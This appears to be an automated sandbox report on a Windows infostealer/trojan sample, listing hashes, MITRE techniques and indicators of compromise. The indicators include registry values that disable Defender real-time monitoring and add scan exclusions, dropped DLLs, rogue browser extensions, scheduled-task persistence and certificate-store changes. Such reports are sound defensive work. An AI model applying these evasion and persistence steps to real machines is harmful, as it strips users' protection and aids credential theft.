c3605f44c32f4ef1d51e44e6546350c03d2d0a16531fd3b5b17e3ec97ca1b648

Analysis

max time kernel
129s
max time network
133s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
25-09-2022 13:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

7.2MB
MD5

fca5b5a89605e55f49094e21f933f902
SHA1

e3075d5365edd4e3ad46d0c314e4861edb61d702
SHA256

c3605f44c32f4ef1d51e44e6546350c03d2d0a16531fd3b5b17e3ec97ca1b648
SHA512

1f9597de3b1c12af02e562e04a5083eafc9d6fccedc20f1f5f8dd02db34e25b29fca886035a74b4ab673ed5bed12b2e49c88cb592441eb9b9af0039118e2c86c
SSDEEP

196608:91OZ6xaxnguA9CVhUX7teutpSpRZZ86giA2gUA7MdN:3OZleiVhU4Lp3WZl2gHaN

Score

10^/10

discovery evasion spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 36 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.execonhost.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MNBTbrbBidagOXts = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MNBTbrbBidagOXts = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CXdyuXxQU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YnFPtusxCOTU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YnFPtusxCOTU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bOFQhydRtxUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bOFQhydRtxUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LCSurMlfClMRC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	conhost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MNBTbrbBidagOXts = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\MNBTbrbBidagOXts = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR = "0"	conhost.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\RIEoyfpemMjlUPVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LCSurMlfClMRC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\CXdyuXxQU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\RIEoyfpemMjlUPVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ShihPiYTNRQZVEffH = "0"	reg.exe

Blocklisted process makes network request 6 IoCs

Processes:

rundll32.exe

flow pid process

29 1852 rundll32.exe
30 1852 rundll32.exe
31 1852 rundll32.exe
32 1852 rundll32.exe
33 1852 rundll32.exe
35 1852 rundll32.exe
Executes dropped EXE 4 IoCs

Processes:

Install.exeInstall.exeETvzHmh.execOacQrK.exe

pid process

824 Install.exe
936 Install.exe
1424 ETvzHmh.exe
1652 cOacQrK.exe

flow	pid	process
29	1852	rundll32.exe
30	1852	rundll32.exe
31	1852	rundll32.exe
32	1852	rundll32.exe
33	1852	rundll32.exe
35	1852	rundll32.exe

pid	process
824	Install.exe
936	Install.exe
1424	ETvzHmh.exe
1652	cOacQrK.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rundll32.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cOacQrK.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation cOacQrK.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4063495947-34355257-727531523-1000\Control Panel\International\Geo\Nation	cOacQrK.exe

Loads dropped DLL 12 IoCs

Processes:

file.exeInstall.exeInstall.exerundll32.exe

pid	process
1268	file.exe
824	Install.exe
824	Install.exe
824	Install.exe
824	Install.exe
936	Install.exe
936	Install.exe
936	Install.exe
1852	rundll32.exe
1852	rundll32.exe
1852	rundll32.exe
1852	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

Processes:

cOacQrK.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json	cOacQrK.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json	cOacQrK.exe

Drops file in System32 directory 23 IoCs

Processes:

rundll32.exeETvzHmh.execOacQrK.exepowershell.EXEInstall.exepowershell.EXEpowershell.EXEpowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	rundll32.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	ETvzHmh.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	ETvzHmh.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04	cOacQrK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	cOacQrK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1	cOacQrK.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	cOacQrK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA	cOacQrK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9	cOacQrK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3	cOacQrK.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	ETvzHmh.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	cOacQrK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9	cOacQrK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1	cOacQrK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3	cOacQrK.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	cOacQrK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04	cOacQrK.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA	cOacQrK.exe

Drops file in Program Files directory 13 IoCs

Processes:

cOacQrK.exe

description	ioc	process
File created	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	cOacQrK.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi	cOacQrK.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	cOacQrK.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	cOacQrK.exe
File created	C:\Program Files (x86)\CXdyuXxQU\jqmRzfb.xml	cOacQrK.exe
File created	C:\Program Files (x86)\YnFPtusxCOTU2\hgFoohCsOHkpB.dll	cOacQrK.exe
File created	C:\Program Files (x86)\YnFPtusxCOTU2\XHrQjvz.xml	cOacQrK.exe
File created	C:\Program Files (x86)\CXdyuXxQU\gohsHp.dll	cOacQrK.exe
File created	C:\Program Files (x86)\bOFQhydRtxUn\adTnwJk.dll	cOacQrK.exe
File created	C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR\aPgtbNg.dll	cOacQrK.exe
File created	C:\Program Files (x86)\LCSurMlfClMRC\JQfQHQE.dll	cOacQrK.exe
File created	C:\Program Files (x86)\LCSurMlfClMRC\yLtIMQt.xml	cOacQrK.exe
File created	C:\Program Files (x86)\VXhYlHHfTIOjvDnxzUR\yQulwwo.xml	cOacQrK.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\beNJzxXkYGhzSCmkZn.job	schtasks.exe
File created	C:\Windows\Tasks\GrrjjXtPjBVPFNmZQ.job	schtasks.exe
File created	C:\Windows\Tasks\ErhcMqZyPKQzNnH.job	schtasks.exe
File created	C:\Windows\Tasks\NSdDFfEujjmGqHjBl.job	schtasks.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
812	schtasks.exe
1852	schtasks.exe
1920	schtasks.exe
1368	schtasks.exe
1464	schtasks.exe
812	schtasks.exe
2032	schtasks.exe
780	schtasks.exe
1376	schtasks.exe
2044	schtasks.exe
1440	schtasks.exe
1820	schtasks.exe
1064	schtasks.exe

Enumerates system info in registry 2 TTPs 4 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exerundll32.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	rundll32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	rundll32.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

cOacQrK.exerundll32.exewscript.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	cOacQrK.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b2-de-03-54-62-3a\WpadDetectedUrl	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A989315-2F3E-4F27-9653-DE8A5C45D76E}\b2-de-03-54-62-3a	cOacQrK.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	cOacQrK.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b2-de-03-54-62-3a\WpadDecisionReason = "1"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	cOacQrK.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	cOacQrK.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A989315-2F3E-4F27-9653-DE8A5C45D76E}	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	rundll32.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	cOacQrK.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	cOacQrK.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	wscript.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	cOacQrK.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b2-de-03-54-62-3a\WpadDecisionTime = c09064fae0d0d801	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	cOacQrK.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\b2-de-03-54-62-3a\WpadDecision = "0"	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A989315-2F3E-4F27-9653-DE8A5C45D76E}\WpadNetworkName = "Network 2"	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host	wscript.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	wscript.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	wscript.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A989315-2F3E-4F27-9653-DE8A5C45D76E}\b2-de-03-54-62-3a	rundll32.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	cOacQrK.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	rundll32.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f000d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	rundll32.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	cOacQrK.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	cOacQrK.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	cOacQrK.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

cOacQrK.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa